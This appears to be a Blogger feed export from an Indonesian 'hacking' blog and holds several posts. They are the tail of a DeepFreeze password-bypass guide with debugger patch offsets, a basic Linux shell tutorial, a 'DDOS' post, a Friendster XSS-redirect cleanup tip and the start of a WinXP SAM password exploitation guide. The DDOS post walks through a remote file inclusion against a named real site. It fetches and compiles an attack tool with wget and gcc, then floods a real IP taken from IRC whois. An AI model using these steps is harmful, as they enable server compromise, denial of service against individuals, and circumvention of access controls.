/&gt;6.Setelah itu script akan membuka code asli. Perhatikan apakah ada ikon &lt;br /&gt;dfreeze di system tray (DFreeze dapat diset- &lt;br /&gt;untuk tidak menampilkannya),bila tidak ada klik kanan pada jendela &lt;br /&gt;code pilih Go to&gt;Expression dan masukkan nilai &lt;br /&gt;berikut : &lt;br /&gt;versi 4.20.020.0598 &gt; 40A2BE &lt;br /&gt;versi 4.20.120.0598 &gt; idem &lt;br /&gt;versi 4.20.121.0613 &gt; 409F4A &lt;br /&gt;versi 5.20.220.1125 &gt; 40FC4A &lt;br /&gt;versi 5.30.120.1181 &gt; idem &lt;br /&gt;dan klik Ok. Setelah itu program akan menuju ke baris tersebut. Klik &lt;br /&gt;kanan lagi pilih Assemble lalu isi kolom dengan &lt;br /&gt;ekspresi NOP dan jangan lupa checklist pilihan Fill with NOP's lalu &lt;br /&gt;klik Assemble. &lt;br /&gt;7.Kembali lagi ke jendela code, klik kanan untuk memilih Go to dan isi &lt;br /&gt;dengan nilai berikut : &lt;br /&gt;versi 4.20.020.0598 &gt; 40368D &lt;br /&gt;versi 4.20.120.0598 &gt; idem &lt;br /&gt;versi 4.20.121.0613 &gt; 4034F5 &lt;br /&gt;versi 5.20.220.1125 &gt; 4037E9 &lt;br /&gt;versi 5.30.120.1181 &gt; 4037E9 &lt;br /&gt;lalu kilk Ok. Program akan menuju baris tersebut. Kita akan membuat &lt;br /&gt;sebuah BreakPoint disini. &lt;br /&gt;8.Klik kanan pilih Breakpoint&gt;Toogle, lalu tekan F9 untuk eksekusi &lt;br /&gt;baris tersebut. Bila benar akan muncul 2 ikon &lt;br /&gt;Deepfreeze pada system tray. Pilihlah salah satu ikon tersebut dan &lt;br /&gt;tekan Shift+dobel klik atau ctrl+Shift+Alt+F6 &lt;br /&gt;untuk membuka Form Login DFreeze. Isi kolom password dengan apa saja &lt;br /&gt;allu klik OK atau Enter. &lt;br /&gt;9.Jika ikon yang kita pilih benar maka form Login tersebut seolah-olah &lt;br /&gt;"Membeku". Kembali ke jendela code di Ollydbg &lt;br /&gt;tekan F8 dan lihat jendela register di sebelah kanan, ganti isi &lt;br /&gt;register EAX dengan nilai 1 (dalam hexadesimal) dengan &lt;br /&gt;dobel klik di register tersebut. (nilai 000000000 merupakan value &lt;br /&gt;"False" untuk pengecekan password) &lt;br /&gt;10.Tekan F9 untuk eksekusi program lagi, bila benar maka kita akan &lt;br /&gt;mendapatkan sebuah form Config dari DeepFreeze. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;referensi : &lt;br /&gt;1.http://usuarios.arnet.com.ar/fliamarconato/ &lt;br /&gt;2.http://webs.uolsinectis.com.ar/c_delgado/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5773664350252692454-7209487360157444664?l=jepunscript-itzone.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jepunscript-itzone.blogspot.com/feeds/7209487360157444664/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5773664350252692454&amp;postID=7209487360157444664&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/7209487360157444664'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/7209487360157444664'/><link rel='alternate' type='text/html' href='http://jepunscript-itzone.blogspot.com/2008/01/about-deepfreeze.html' title='about deepfreeze'/><author><name>HACKERS COMMUNITY</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5773664350252692454.post-7953301098739722875</id><published>2008-01-31T01:04:00.000-08:00</published><updated>2008-06-29T04:07:06.324-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Linux'/><title type='text'>Mempelajari Dasar-dasar Shell</title><content type='html'>Dunia Linux atau umumnya keluarga unix mempunyai perbedaan jauh dibandingkan dengan system operasi lain, misalnya Microsoft Windows. Dikarenakan terbiasa dengan windows maka akan sangat sulit jika harus langsung berhadapan dengan linux. Secara teoritis sebelum menggunakan linux hal dasar yang harus di ketahui ialah istilah-istilah yang ada di Linux. Shell salah satu istilah yang umum diperbincangkan tapi banyak juga yang sampai detik ini belum mempunyai gambaran jelas, padahal shell ialah tempat konfigurasi dan menjalankan / mengoperasikan Linux.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; Distro (distribusi) linux sekarang ini telah dikembangkan oleh para developer untuk membuat Linux secantik mungkin. Dengan tujuan agar linux digemari dan masyarakat mulai beralih ke sebuah babak baru; open source. Dengan menyertakan berbagai kecantikan dari window manager seperti KDE, Gnome maka banyak pemula linux yang mengabaikan keberadaan shell. Shell tidak ditujukan bagi seorang admin tapi juga bagi pengguna linux tanpa kecuali. Dibawah ini diuraikan kegunaan shell yang saya petik dari artikel I Made Wiryana (Pengantar Belajar Unix).&lt;br /&gt;&lt;br /&gt; Kegunaan Shell&lt;br /&gt;&lt;br /&gt; 1. Pemakaian interaktif&lt;br /&gt; 2. Untuk mengontrol session UNIX&lt;br /&gt; Contohnya: Set home directory, mail directory, startup file.&lt;br /&gt; 3. Pemrograman&lt;br /&gt; Unix shell menyediakan sekumpulan instruksi khusus yang dapat digunakan untuk membuat program shell scripts.&lt;br /&gt;&lt;br /&gt;Shell secara singkat seperti MS DOS milik Microsoft. Memang benar bahwa dibutuhkan hafalan-hafalan perintah jika ingin melakukan sesuatu. Contohnya proses copy file, jika ingin mengcopy file maka perlu mengetikkan perintah tertentu dan mungkin anda berfikir terlalu lama. Jika dibandingkan dengan window manager seperti KDE anda hanya dengan memainkan mouse saja.&lt;br /&gt;&lt;br /&gt; Kalaupun merasa nyaman dengan menggunakan window manager (KDE, Gnome) maka yakinlah bahwa sesungguhnya window manager merupakan 'kepanjangan tangan' dari shell. Window manager merupakan visualisasi dari shell untuk mempermudah pengoperasian.&lt;br /&gt;&lt;br /&gt;Contoh sederhana ialah jika menggunakan KDE untuk melihat informasi prosessor maka bisa melihatnya di control center. Tapi sebenarnya perintah tersebut merupakan visualisasi dari perintah di shell yaitu:&lt;br /&gt;&lt;br /&gt;[syafii@sapitenk syafii]$ cat /proc/cpuinfo&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; Kenapa Shell?&lt;br /&gt;Shell merupakan command-line intepreter artinya untuk melakukan apapun harus dengan mengetikkan baris perintah. Dennis Ritchie dan Ken Thompson (Pembuat Unix) berpendapat media apa yang harus di buat agar orang dapat 'mencoba' unix mereka. Kemudian dibuatlah shell dengan nama Bourne Shell (sh) yang dibuat oleh SR Bourne. Semenjak itu bermuncullah jenis shell yang lain yaitu C shell, Korn shell dan milik GNU sendiri yaitu Bourne Again Shell (bash), shell versi gratis. Secara default dalam Linux menggunakan bash shell. Untuk melihat tipe shell dari user ketikkan:&lt;br /&gt;&lt;br /&gt;sintaksnya yaitu:&lt;br /&gt; $grep nama_user /etc/passwd&lt;br /&gt;&lt;br /&gt;[syafii@sapitenk syafii]$ grep syafii /etc/passwd&lt;br /&gt;syafii:x:500:500::/home/syafii:/bin/bash&lt;br /&gt;&lt;br /&gt;Panduan untuk mengetahui jenis shell.&lt;br /&gt;Shell Jenis&lt;br /&gt;/bin/csh atau /usr/bin/csh C shell&lt;br /&gt;/bin/sh Bourne shell (bash)&lt;br /&gt;/bin/rsh Restricted Bourne shell&lt;br /&gt;/bin/jsh Bourne shell termasuk jobs control&lt;br /&gt;/bin/ksh Korn shell&lt;br /&gt;/bin/rksh Restricted Korn sh&lt;br /&gt;&lt;br /&gt; Dari contoh diatas username syafii menggunakan shell jenis bash. Shell secara garis besar lebih power full dibandingkan dengan window manager. Yang perlu diingat karena linux ditulis dengan bahasa C dan bahasa C bersifat case sensitif yang artinya membedakan antara huruf kecil dan besar, maka perintah di shell ketik dalam huruf kecil jika diketik dalam huruf besar shell tidak akan mengenali.&lt;br /&gt;&lt;br /&gt;Struktur Prompt di Shell&lt;br /&gt;&lt;br /&gt;[username@hostname pwd]$&lt;br /&gt;&lt;br /&gt;Contoh:&lt;br /&gt;&lt;br /&gt;[syafii@sapitenk /home]$&lt;br /&gt;&lt;br /&gt;Rumus diatas merupakan struktur prompt shell dimana username ialah nama user, hostname ialah nama host (default-nya localhost), sedangkan pwd ialah direktori sekarang (letak kursor berada), tanda $ berarti sebagai user saja, untuk root (sebutan administrator untuk keluarga unix) menggunakan tanda #.&lt;br /&gt;&lt;br /&gt; Perintah Dasar Shell&lt;br /&gt;&lt;br /&gt;pwd&lt;br /&gt;&lt;br /&gt;pwd (present working directory) ialah perintah untuk melihat direktori kerja sekarang atau mudahnya untuk melihat posisi kursor sekarang.&lt;br /&gt;&lt;br /&gt;$pwd&lt;br /&gt;/home&lt;br /&gt;&lt;br /&gt;cd (change directory)&lt;br /&gt;&lt;br /&gt;cd digunakan untuk berpindah direktori.&lt;br /&gt; Sintaknya :&lt;br /&gt;cd nama_direktori&lt;br /&gt;&lt;br /&gt;$ls&lt;br /&gt;ftp httpd syafii&lt;br /&gt;&lt;br /&gt;Untuk pindah ke direktori syafii dapat digunakan perintah&lt;br /&gt;&lt;br /&gt;$ cd syafii&lt;br /&gt;&lt;br /&gt;Ada trik mengenai perintah cd, ketika anda dihadapkan pada suatu kasus dimana nama direktori tersebut panjang dan jika di ketik terlalu lama dan rentan kesalahan ketik, maka cukup ketik satu atau beberapa huruf dan tekan tombol tab.&lt;br /&gt;&lt;br /&gt;1. $ cd s # tekan tab hasilnya seperti dibawah ini&lt;br /&gt;2. $ cd syafii/&lt;br /&gt;&lt;br /&gt; Contoh diatas ingin berpindah ke direktori syafii, cukup dengan mengetikkan 'cd s' dan tekan tombol tab maka hasilnya akan seperti pada contoh kedua. Anda yang mulai menekuni dunia linux dan menginstall aplikasi under shell gunakan trik diatas.&lt;br /&gt;Perintah cd digunakan untuk berpindah direktori sedangkan untuk berpindah direktori diatasnya&lt;br /&gt;&lt;br /&gt;$pwd&lt;br /&gt;/home/syafii/mail&lt;br /&gt;$cd .. #naik satu tingkat direktiry diatasnya&lt;br /&gt;$pwd&lt;br /&gt;/home/syafii&lt;br /&gt;&lt;br /&gt;su (subtitute user)&lt;br /&gt;&lt;br /&gt;su digunakan untuk berpindah user (switch).&lt;br /&gt;&lt;br /&gt; Sintaknya:&lt;br /&gt;&lt;br /&gt;$su nama_user&lt;br /&gt;&lt;br /&gt;Namun jika anda mengetikkan 'su' saja maka defaultnya switch ke root (administrator).&lt;br /&gt;&lt;br /&gt;[syafii@sapitenk syafii]$ su&lt;br /&gt;Password:&lt;br /&gt;[root@sapitenk syafii]#&lt;br /&gt;&lt;br /&gt;Ingat password di linux tidak ditampilkan (no-echo).&lt;br /&gt;&lt;br /&gt;ls (List)&lt;br /&gt;&lt;br /&gt;Perintah 'dir' pada Dos digunakan untuk melihat isi directory begitu juga dengan di shell digunakan 'ls'. Namun di shell juga di kenal perintah 'dir' yang mempunyai output yang sama dengan 'ls'.&lt;br /&gt;&lt;br /&gt;Sintaknya:&lt;br /&gt; $ls&lt;br /&gt;&lt;br /&gt;$ls&lt;br /&gt;Mail home mail mbox&lt;br /&gt;&lt;br /&gt;Perintah di atas digunakan untuk menampilkan isi directory, seperti halnya pada windows di linux juga terdapat file hidden (nama file yang diawali dengan tanda titik berarti file hidden). Untuk menampilkan file hidden maka tambahkan atribut '-a' pada ls. Huruf 'a' berarti menampilkan semua (all) file tanpa kecuali.&lt;br /&gt;&lt;br /&gt;Sintaknya:&lt;br /&gt;&lt;br /&gt;$ls -a&lt;br /&gt;&lt;br /&gt;Untuk menampilkan file lengkap dengan ukuran , waktu di-create dan hak kepemilikan tambahkan atribut '-l' (long).&lt;br /&gt; $ls -l&lt;br /&gt;total 16 # nilai total dicari dari jumlah file keseluruhan termasuk file hidden&lt;br /&gt;drwx------ 2 syafii syafii 4096 Aug 12 22:46 Mail&lt;br /&gt;drwxrwxr-x 2 syafii syafii 4096 Aug 15 08:37 home&lt;br /&gt;drwx------ 2 syafii syafii 4096 Aug 12 22:44 mail&lt;br /&gt;-rw------- 1 syafii syafii 1797 Aug 12 22:45 mbox&lt;br /&gt;&lt;br /&gt;Atribut 'a' dan 'l' juga dapat digabung dengan sintak :&lt;br /&gt;$ls -al&lt;br /&gt;&lt;br /&gt;cat (Concatenate)&lt;br /&gt;&lt;br /&gt;Perintah cat digunakan untuk melihat isi file. Layaknya perintah 'type' di dos.&lt;br /&gt;&lt;br /&gt;Sintaksnya:&lt;br /&gt;&lt;br /&gt;$cat nama_file&lt;br /&gt;&lt;br /&gt;$cat test.txt&lt;br /&gt;ilmu&lt;br /&gt;komputer&lt;br /&gt;&lt;br /&gt;mkdir (Make directory)&lt;br /&gt;&lt;br /&gt; Perintah yang satu ini mempunyai fungsi yang sama dengan perintah 'md' pada DOS. Untuk membuat direktori ketik saja mkdir.&lt;br /&gt;&lt;br /&gt;Sintaksnya:&lt;br /&gt;$mkdir nama_direktori&lt;br /&gt;$mkdir ilmu_komputer&lt;br /&gt;$ls&lt;br /&gt;Mail home mail mbox ilmu_komputer test.txt&lt;br /&gt;&lt;br /&gt;rmdir (remove directory)&lt;br /&gt;&lt;br /&gt;Kebalikan dari mkdir, rmdir berfungsi menghapus direktori.&lt;br /&gt;&lt;br /&gt;Sintaksnya:&lt;br /&gt;$rmdir nama_direktori&lt;br /&gt;$rmdir pcplus&lt;br /&gt;&lt;br /&gt;rm (remove)&lt;br /&gt;&lt;br /&gt;Jika rmdir digunakan untuk menghapus direktori maka untuk menghapus (remove) file digunakan perintah rm.&lt;br /&gt;&lt;br /&gt;Sintaksnya:&lt;br /&gt;$rm nama_file&lt;br /&gt;$rm test.txt&lt;br /&gt;&lt;br /&gt;cp (copy)&lt;br /&gt;&lt;br /&gt; Untuk mengcopy file dalam satu direktori atau antar direktori secara umum mempunyai sintaks:&lt;br /&gt;&lt;br /&gt;$cp nama_file tujuan&lt;br /&gt;$cp test.txt pcplus/&lt;br /&gt;&lt;br /&gt;Keterangan perintah diatas yaitu file test.txt akan di copy ke direktori pcplus.&lt;br /&gt;&lt;br /&gt;mv (move)&lt;br /&gt;&lt;br /&gt;Membuat, menghapus file sudah anda pelajari. Sekarang perintah mv mempunyai dua makna artian yaitu:&lt;br /&gt;&lt;br /&gt;1. 'mv' untuk memindahkan file ke direktori lain&lt;br /&gt;Sintaks:&lt;br /&gt;$mv nama_file direktori_tujuan&lt;br /&gt;$mv test.txt pcplus&lt;br /&gt;&lt;br /&gt;file test.txt akan dipindahkan di direktori pcplus.&lt;br /&gt; 2. 'mv' digunakan untuk merubah ke nama file lain (rename).&lt;br /&gt;Sintaks:&lt;br /&gt;$mv nama_file_lama nama_file-baru&lt;br /&gt;$mv test.txt tess.txt&lt;br /&gt;&lt;br /&gt;file test.txt akan di rename menjadi tess.txt&lt;br /&gt;&lt;br /&gt;more&lt;br /&gt;&lt;br /&gt;Perintah terakhir ini sama fungsinya dengan cat yaitu melihat isi file. Tapi sekarang akan ditunjukkan bagaimana menggabungkan isi dari 2 file menjadi satu tanpa menghapus masing-masing isi.&lt;br /&gt;&lt;br /&gt;Sekarang buat dua file yaitu : coba.txt dan test.txt&lt;br /&gt;$vi coba.txt&lt;br /&gt;Tekan 'i' , ketikkan kalimat 'kalimat ini saya tulis dari coba.txt' , tekan tombol esc (escape) titik dua (:) lanjutkan dengan ketik wq&lt;br /&gt;&lt;br /&gt; Kemudian ketik perintah di bawah ini untuk melihat hasilnya.&lt;br /&gt;&lt;br /&gt;$cat coba.txt&lt;br /&gt;kalimat ini saya tulis dari coba.txt&lt;br /&gt;&lt;br /&gt;Buat lagi file yang kedua dengan nama test.txt yang isinya 'kalimat ini saya tulis dari test.txt'&lt;br /&gt;&lt;br /&gt;$cat test.txt&lt;br /&gt;kalimat ini saya tulis dari test.txt&lt;br /&gt;&lt;br /&gt;Nah, sekarang anda sudah mempunyai dua file coba.txt dan test.txt sekarang akan dicopy isi file dari coba.txt ke dalam test.txt&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;kalimat ini saya tulis dari test.txt&lt;br /&gt;kalimat ini saya tulis dari coba.txt&lt;br /&gt;&lt;br /&gt; tanda &gt;&gt; berarti memasukkan suatu kejadian. Misalnya dari contoh diatas , perintah&lt;br /&gt;$more coba.txt &gt;&gt; test.txt berarti&lt;br /&gt;pertama kali yang dilakukan dengan perintah diatas ialah melihat isi file (more) dari coba.txt setelah itu hasil eksekusinya di masukkan (&gt;&gt;) ke test.txt. Tanda &gt;&gt; berarti tidak meng-overwrite isi file yang terdapat pada test.txt . Tetapi jika anda hanya menggunakan tanda &gt; saja, maka isi file test.txt akan di hapus diganti dengan isi file coba.txt&lt;br /&gt;&lt;br /&gt;$more coba.txt &gt; test.txt&lt;br /&gt;$cat test.txt&lt;br /&gt;kalimat ini saya tulis dari coba.txt&lt;br /&gt;&lt;br /&gt;Trik Shell:&lt;br /&gt;&lt;br /&gt; * Untuk mencari file perintah yang digunakan locate&lt;br /&gt;&lt;br /&gt; $locate nama_file&lt;br /&gt; * Jika ingin reboot (harus menjadi root dulu) lewat shell ketikkan perintah&lt;br /&gt;&lt;br /&gt; #/sbin/reboot&lt;br /&gt;&lt;br /&gt; Untuk shutdown&lt;br /&gt;&lt;br /&gt; #/sbin/shutdown -h now&lt;br /&gt;&lt;br /&gt; atribut -h berarti halt dan shutdown dilaksanakan sekarang (now).&lt;br /&gt; * Untuk menghapus layer ketikkan 'clear'&lt;br /&gt;&lt;br /&gt; $clear # atau juga dapat dengan menekan ctrl+l&lt;br /&gt;&lt;br /&gt;Kesimpulan&lt;br /&gt;Perintah pada shell sebenarnya sangat mudah. Semua daftar perintah mudah dihafal. Contohnya ls berasal dari kata list, cp berasal dari kata copy. Namun untuk melihat argument (atribut) yang lengkap dapat anda ketikkan seperti di bawah ini.&lt;br /&gt;&lt;br /&gt;$man nama_perintah&lt;br /&gt;&lt;br /&gt;Contoh:&lt;br /&gt;&lt;br /&gt;$man cp&lt;br /&gt;&lt;br /&gt;Untuk keluar dari man ketik 'q'. &lt;br /&gt;http://www.sony-ak.com/articles/1/dasar_dasar_shell.php&lt;br /&gt;dikutip dari : www.google.com :P&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5773664350252692454-7953301098739722875?l=jepunscript-itzone.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jepunscript-itzone.blogspot.com/feeds/7953301098739722875/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5773664350252692454&amp;postID=7953301098739722875&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/7953301098739722875'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/7953301098739722875'/><link rel='alternate' type='text/html' href='http://jepunscript-itzone.blogspot.com/2008/01/mempelajari-dasar-dasar-shell.html' title='Mempelajari Dasar-dasar Shell'/><author><name>HACKERS COMMUNITY</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5773664350252692454.post-741940241782516030</id><published>2008-01-31T00:43:00.001-08:00</published><updated>2008-06-29T04:11:25.784-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>DDOS</title><content type='html'>Disini kamu musti usaha sendiri mencari target nya.&lt;br /&gt; Langkah-langkah nya :&lt;br /&gt; &lt;br /&gt; 1. http://www.defendersofmodan.net/index.php?name=PNphpBB2 &lt;br /&gt; &lt;br /&gt; 2. Kemudian hapus/delete index.php?name=PNphpBB2 di url/browsing sehingga menjadi http://www.defendersofmodan.net &lt;br /&gt; &lt;br /&gt; 3. Masukkan bug ini di belakang situs tadi :&lt;br /&gt; &lt;br /&gt; modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= &lt;br /&gt; &lt;br /&gt; Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= &lt;br /&gt; &lt;br /&gt; 4. Masukkan file inject ini di belakang nya lagi :&lt;br /&gt; &lt;br /&gt; http://www.geocities.com/jambihackerlinkcrew/sql.htm&lt;br /&gt; &lt;br /&gt;Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/jambihackerlinkcrew/sql.htm?&amp;cmd=pwd&lt;br /&gt; &lt;br /&gt; Jangan lupa memasukkan command Unix di ujungnya&lt;br /&gt; &lt;br /&gt; 5. Masukkan file tembak.c ini di belakang nya lagi : &lt;br /&gt; &lt;br /&gt; http://www.freewebs.com/jambihackerlink/tembak.c&lt;br /&gt; &lt;br /&gt;Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&amp;cmd=wget http://www.freewebs.com/jambihackerlink/tembak.c -O /var/tmp/tembak.c&lt;br /&gt; &lt;br /&gt; 6. Kemudian Compile file tembak.c&lt;br /&gt; &lt;br /&gt;http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&amp;cmd=gcc -o /var/tmp/jambihackerlink /var/tmp/tembak.c&lt;br /&gt; &lt;br /&gt; 7. Utk mendapatkan IP target, buka Mirc trus join salah satu canel di Dalnet. Arahkan mouse ke salah satu nickname di canel itu trus klik kanan lalu pilih Whois&lt;br /&gt; &lt;br /&gt; misal nya &lt;br /&gt; &lt;br /&gt; ce_sweet83 is ~cute_83@202.155.150.70 * ce_cute&lt;br /&gt; &lt;br /&gt; Kemudian kita cari keberadaan IP tersebut, misal nya http://www.dnsstuff.com/tools/whois.ch?ip=202.155.150.70&lt;br /&gt; Ternyata target nya menggunakan ISP : Indosat Internet Service Providers &lt;br /&gt; &lt;br /&gt; 8. Skrg kita serang dgn DDOS supaya target nya Disconnect dari Dalnet (ingat, bandwith kamu harus lebih besar utk melakukan DDOS).&lt;br /&gt; &lt;br /&gt;misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&amp;cmd=/var/tmp/./jambihackerlink ip port&lt;br /&gt; &lt;br /&gt;http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&amp;cmd=/var/tmp/./jambihackerlink 202.155.150.70 22 atau 202.155.150.70 53&lt;br /&gt; &lt;br /&gt; Tunggu beberapa saat....... otomatis target nya akan Disconnect dari Dalnet&lt;br /&gt;&lt;br /&gt;copi dari jambihackerlink :P&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5773664350252692454-741940241782516030?l=jepunscript-itzone.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jepunscript-itzone.blogspot.com/feeds/741940241782516030/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5773664350252692454&amp;postID=741940241782516030&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/741940241782516030'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/741940241782516030'/><link rel='alternate' type='text/html' href='http://jepunscript-itzone.blogspot.com/2008/01/ddos.html' title='DDOS'/><author><name>HACKERS COMMUNITY</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5773664350252692454.post-4391204132716387236</id><published>2008-01-30T23:06:00.000-08:00</published><updated>2008-06-29T04:09:50.388-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title type='text'>Mengalihkan halaman pada Friendster</title><content type='html'>Dan saya juga yakin banyak korban yang berjatuhan (perang kalee...). Jika Anda merupakan salah satu korbannya, itu bukanlah akhir riwayat dari account friendster Anda. Berikut tips yang dapat Anda ikuti untuk menghapus testimonial usil tersebut.&lt;br /&gt; &lt;br /&gt; 1. Login ke account Friendster Anda (yang mendapatkan testimonial usil tentunya).&lt;br /&gt; &lt;br /&gt; 2. Setelah masuk ke Home Anda, akan nampak link New Testimonials, jangan diklik dulu.&lt;br /&gt; &lt;br /&gt; 3. Disable Java dan JavaScript pada browser Anda. Tiap browser memiliki option tersendiri untuk melakukan hal ini. Contoh pada Mozilla Firefox :&lt;br /&gt; - klik Tool &gt; Preferences (Windows) atau Edit &gt; Preferences (Linux)&lt;br /&gt; - klik Content&lt;br /&gt; - uncheck Enable Java dan Enable JavaScript&lt;br /&gt; Lakukan hal ini setelah Anda Log in, karena jika ini dilakukan sebelum Log in, Anda tidak akan bisa Log in.&lt;br /&gt; &lt;br /&gt; 4. Setelah Java dan JavaScript di disable, klik New Testimonials, untuk masuk ke halaman Pending Testimonials Anda. Untuk membedakan Testimonial usil dan biasa, lihat saja dari source code, (pada Firefox, tekan Ctrl+U, atau klik View &gt; Page Source). Testimonial usil akan memiliki source seperti berikut :&lt;br /&gt; &lt;img id="" width="0"&gt;&amp;#x3C;script&gt;window.location="http://xxx.injeksi.com";&amp;#x3C;/script&gt;&lt;br /&gt; &lt;br /&gt; 5.Delete lah testimonial tersebut.&lt;br /&gt; &lt;br /&gt; 6. Enable kan kembali Java dan JavaScript, agar Anda bisa surfing dan Logout dengan sukses.&lt;br /&gt; &lt;br /&gt; Demikian, semoga bisa membantu bagi yang membutuhkan.&lt;br /&gt; &lt;br /&gt; Salam Hacker Indonesia /no1&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5773664350252692454-4391204132716387236?l=jepunscript-itzone.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jepunscript-itzone.blogspot.com/feeds/4391204132716387236/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5773664350252692454&amp;postID=4391204132716387236&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/4391204132716387236'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/4391204132716387236'/><link rel='alternate' type='text/html' href='http://jepunscript-itzone.blogspot.com/2008/01/mengalihkan-halaman-pada-friendster.html' title='Mengalihkan halaman pada Friendster'/><author><name>HACKERS COMMUNITY</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5773664350252692454.post-5453971741649334309</id><published>2008-01-30T22:57:00.001-08:00</published><updated>2008-06-29T03:52:31.783-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Tekhnik Exploit Password WinXP</title><content type='html'>Kali ini saya akan mencoba untuk menjelaskan 2 teknik exploitasi pada windows XP, pertama melakukan pemanfaatan SAM files dan terakhir memanfaatkan RPC-nya Windows XP. Tekhnik kedua sebetulnya adalah kelanjutan dari artikelnya mRt di echo zine 10 yang membahas tentang Exploitasi Windows XP [pada fat32] dengan memanfaatkan sang Admin sendiri (hehuehuheue ... ) dan batch file yang disisipkan di start|program|startup oleh sang kriminal :), sedangkan kali ini yang saya bahas adalah jenis NTFS, yang tidak memiliki acces seperti pada fat32 untuk dapat menaruh batch file di folder start up nya sang Admin tersayang, sehingga apabila dipaksakan “Access Denied” adalah jawabannya. Apa akibatnya jika kita menggunakan kedua tekhnik diatas ?, yang jelas mah sama-sama buat orang seneng... heuheueehuhuehuee ! Jawab sendiri dah ... &lt;br /&gt;Tekhnik pertama : &lt;br /&gt; Yang kita butuhkan sekarang adalah : &lt;br /&gt; Petter Recovery Password yang bisa di download dari situsnya langsung http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html sekalian sama infonya aja, biasanya sudah di sediakan dalam bentuk rar yang bisa di jadikan bootdisk. Yang penulis pakai untuk experimen kali ini yaitu versi bd040818 terdapat 3 file di dalamnya yakni bd040818.bin , install.bat , rawrite2.exe .&lt;br /&gt; 1 buah disket kosong dan layak pakai. :) --&gt; untuk disket boot Petter Recovery Password.&lt;br /&gt; Nekatzzzz .... &lt;br /&gt;Kasusnya begini, misalnya ....anggap saja kita lupa password untuk login winXP nya. : ) atau kasus yang laen aja kali ya, yang lebih menantang ... hehehe. Misalnya ada rampok yang kebingungan nggak bisa login, padahal kompienya mo dijual ... huehueueheue. Ada yang kesindir nggak nih ??? Udah ah bcanda mulu. Langsung aja deuh ... &lt;br /&gt;Langkah pertama ... Setelah Petter Recovery Password di jadikan bootdisk, langsung saja booting dengan disket tersebut ... &lt;br /&gt; Langkah berikutnya, anda akan di tanya di drive mana SAM file berada. Tekan enter saja untuk defaultnya, setelah itu akan ditanyakan secara spesifik lagi, di direktori mana file SAM berada, biasanya untuk yang defaultnya tuh SAM file berada di /windows/system32/config, enter lagi aja untuk yang defaultnya. Setelah itu ....... Nah 